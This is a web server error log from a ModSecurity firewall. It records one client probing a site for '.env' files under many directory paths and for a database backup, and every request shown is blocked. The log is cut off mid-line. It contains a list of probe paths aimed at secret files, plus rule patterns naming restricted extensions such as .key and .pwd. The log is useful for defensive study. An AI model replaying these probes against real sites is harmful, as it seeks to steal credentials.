[Fri Jan 09 16:49:24.120199 2026] [:error] [pid 1295009] [client 18.130.245.147:43086] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aWEjhBOQmYLXvoRWxa_UrQAAAAc"]
[Fri Jan 09 16:49:24.120397 2026] [:error] [pid 1295009] [client 18.130.245.147:43086] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aWEjhBOQmYLXvoRWxa_UrQAAAAc"]
[Fri Jan 09 16:49:24.120546 2026] [:error] [pid 1295009] [client 18.130.245.147:43086] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aWEjhBOQmYLXvoRWxa_UrQAAAAc"]
[Fri Jan 09 16:49:24.215558 2026] [:error] [pid 1295010] [client 18.130.245.147:43112] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aWEjhCTjpONdb2ogUxonsQAAAAg"]
[Fri Jan 09 16:49:24.215761 2026] [:error] [pid 1295010] [client 18.130.245.147:43112] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aWEjhCTjpONdb2ogUxonsQAAAAg"]
[Fri Jan 09 16:49:24.215944 2026] [:error] [pid 1295010] [client 18.130.245.147:43112] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aWEjhCTjpONdb2ogUxonsQAAAAg"]
[Fri Jan 09 16:49:24.314466 2026] [:error] [pid 1290985] [client 18.130.245.147:43134] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aWEjhAhnMz7Kl76N6_LzfwAAAAA"]
[Fri Jan 09 16:49:24.314674 2026] [:error] [pid 1290985] [client 18.130.245.147:43134] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aWEjhAhnMz7Kl76N6_LzfwAAAAA"]
[Fri Jan 09 16:49:24.314838 2026] [:error] [pid 1290985] [client 18.130.245.147:43134] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aWEjhAhnMz7Kl76N6_LzfwAAAAA"]
[Fri Jan 09 16:49:24.413466 2026] [:error] [pid 1290986] [client 18.130.245.147:43150] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aWEjhHvPx48oXeBpWHAqXwAAAAE"]
[Fri Jan 09 16:49:24.413665 2026] [:error] [pid 1290986] [client 18.130.245.147:43150] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aWEjhHvPx48oXeBpWHAqXwAAAAE"]
[Fri Jan 09 16:49:24.413824 2026] [:error] [pid 1290986] [client 18.130.245.147:43150] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aWEjhHvPx48oXeBpWHAqXwAAAAE"]
[Fri Jan 09 16:49:24.509628 2026] [:error] [pid 1290989] [client 18.130.245.147:43168] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aWEjhLwxb_CFGAx2PBFTBwAAAAQ"]
[Fri Jan 09 16:49:24.509832 2026] [:error] [pid 1290989] [client 18.130.245.147:43168] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aWEjhLwxb_CFGAx2PBFTBwAAAAQ"]
[Fri Jan 09 16:49:24.510003 2026] [:error] [pid 1290989] [client 18.130.245.147:43168] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aWEjhLwxb_CFGAx2PBFTBwAAAAQ"]
[Fri Jan 09 16:49:24.612989 2026] [:error] [pid 1290988] [client 18.130.245.147:43190] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aWEjhJnqcf3ij-c56sst-QAAAAM"]
[Fri Jan 09 16:49:24.613196 2026] [:error] [pid 1290988] [client 18.130.245.147:43190] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aWEjhJnqcf3ij-c56sst-QAAAAM"]
[Fri Jan 09 16:49:24.613348 2026] [:error] [pid 1290988] [client 18.130.245.147:43190] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aWEjhJnqcf3ij-c56sst-QAAAAM"]
[Fri Jan 09 16:49:24.709937 2026] [:error] [pid 1291018] [client 18.130.245.147:43208] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/client/.env"] [unique_id "aWEjhPa-381C0T8V_x3aZAAAAAU"]
[Fri Jan 09 16:49:24.710132 2026] [:error] [pid 1291018] [client 18.130.245.147:43208] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/client/.env"] [unique_id "aWEjhPa-381C0T8V_x3aZAAAAAU"]
[Fri Jan 09 16:49:24.710279 2026] [:error] [pid 1291018] [client 18.130.245.147:43208] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/client/.env"] [unique_id "aWEjhPa-381C0T8V_x3aZAAAAAU"]
[Fri Jan 09 16:49:24.810295 2026] [:error] [pid 1290987] [client 18.130.245.147:43234] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aWEjhJa6YpMWICkHe7jGWAAAAAI"]
[Fri Jan 09 16:49:24.810528 2026] [:error] [pid 1290987] [client 18.130.245.147:43234] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aWEjhJa6YpMWICkHe7jGWAAAAAI"]
[Fri Jan 09 16:49:24.810678 2026] [:error] [pid 1290987] [client 18.130.245.147:43234] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aWEjhJa6YpMWICkHe7jGWAAAAAI"]
[Fri Jan 09 16:49:24.909244 2026] [:error] [pid 1293937] [client 18.130.245.147:43262] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aWEjhC30tpu2Qs_7o9csDQAAAAY"]
[Fri Jan 09 16:49:24.909454 2026] [:error] [pid 1293937] [client 18.130.245.147:43262] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aWEjhC30tpu2Qs_7o9csDQAAAAY"]
[Fri Jan 09 16:49:24.910075 2026] [:error] [pid 1293937] [client 18.130.245.147:43262] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aWEjhC30tpu2Qs_7o9csDQAAAAY"]
[Fri Jan 09 16:49:25.011963 2026] [:error] [pid 1295009] [client 18.130.245.147:43288] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aWEjhROQmYLXvoRWxa_UrgAAAAc"]
[Fri Jan 09 16:49:25.012170 2026] [:error] [pid 1295009] [client 18.130.245.147:43288] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aWEjhROQmYLXvoRWxa_UrgAAAAc"]
[Fri Jan 09 16:49:25.012327 2026] [:error] [pid 1295009] [client 18.130.245.147:43288] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aWEjhROQmYLXvoRWxa_UrgAAAAc"]
[Fri Jan 09 16:49:25.116291 2026] [authz_core:error] [pid 1295010] [client 18.130.245.147:43314] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Fri Jan 09 16:49:25.208750 2026] [:error] [pid 1290985] [client 18.130.245.147:43344] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env"] [unique_id "aWEjhQhnMz7Kl76N6_LzgAAAAAA"]
[Fri Jan 09 16:49:25.208983 2026] [:error] [pid 1290985] [client 18.130.245.147:43344] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env"] [unique_id "aWEjhQhnMz7Kl76N6_LzgAAAAAA"]
[Fri Jan 09 16:49:25.209155 2026] [:error] [pid 1290985] [client 18.130.245.147:43344] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env"] [unique_id "aWEjhQhnMz7Kl76N6_LzgAAAAAA"]
[Fri Jan 09 16:49:25.308091 2026] [:error] [pid 1290986] [client 18.130.245.147:43358] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env"] [unique_id "aWEjhXvPx48oXeBpWHAqYAAAAAE"]
[Fri Jan 09 16:49:25.308290 2026] [:error] [pid 1290986] [client 18.130.245.147:43358] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env"] [unique_id "aWEjhXvPx48oXeBpWHAqYAAAAAE"]
[Fri Jan 09 16:49:25.308459 2026] [:error] [pid 1290986] [client 18.130.245.147:43358] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env"] [unique_id "aWEjhXvPx48oXeBpWHAqYAAAAAE"]
[Fri Jan 09 16:49:25.411056 2026] [:error] [pid 1290989] [client 18.130.245.147:43376] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aWEjhbwxb_CFGAx2PBFTCAAAAAQ"]
[Fri Jan 09 16:49:25.411272 2026] [:error] [pid 1290989] [client 18.130.245.147:43376] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aWEjhbwxb_CFGAx2PBFTCAAAAAQ"]
[Fri Jan 09 16:49:25.411445 2026] [:error] [pid 1290989] [client 18.130.245.147:43376] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aWEjhbwxb_CFGAx2PBFTCAAAAAQ"]
[Fri Jan 09 16:49:25.515585 2026] [:error] [pid 1290988] [client 18.130.245.147:43402] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/db_backup.sql"] [unique_id 